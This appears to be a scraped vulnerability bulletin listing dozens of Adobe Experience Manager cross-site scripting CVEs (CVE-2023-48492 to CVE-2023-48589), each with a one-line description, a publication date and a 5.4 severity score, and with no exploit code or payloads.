adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48492
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48493
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48494
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48495
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48496
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48497
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48498
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48499
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48500
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48501
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48502
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48503
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48504
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48505
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48506
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48507
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48508
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48509
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48510
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48511
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48512
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48513
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48514
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48515
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48516
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48517
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48518
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48519
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48520
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48521
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48522
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48523
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48524
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48525
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48526
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48527
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48528
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48529
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48530
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48531
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48532
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48533
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48534
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48535
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48536
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48537
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48538
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48539
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48540
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48541
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48542
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48543
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48544
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48545
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48546
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48547
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48548
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48549
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48550
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48551
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48552
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48553
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48554
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48555
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48556
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48557
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48558
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48559
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48560
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48561
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48562
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48563
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48564
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48565
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48566
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48567
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48568
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48569
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48570
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48571
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48572
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48573
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48574
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48575
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48576
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48577
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48578
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48579
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48580
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48581
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48582
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48583
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48584
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48585
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48586
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48587
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48588
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48589
[email protected]
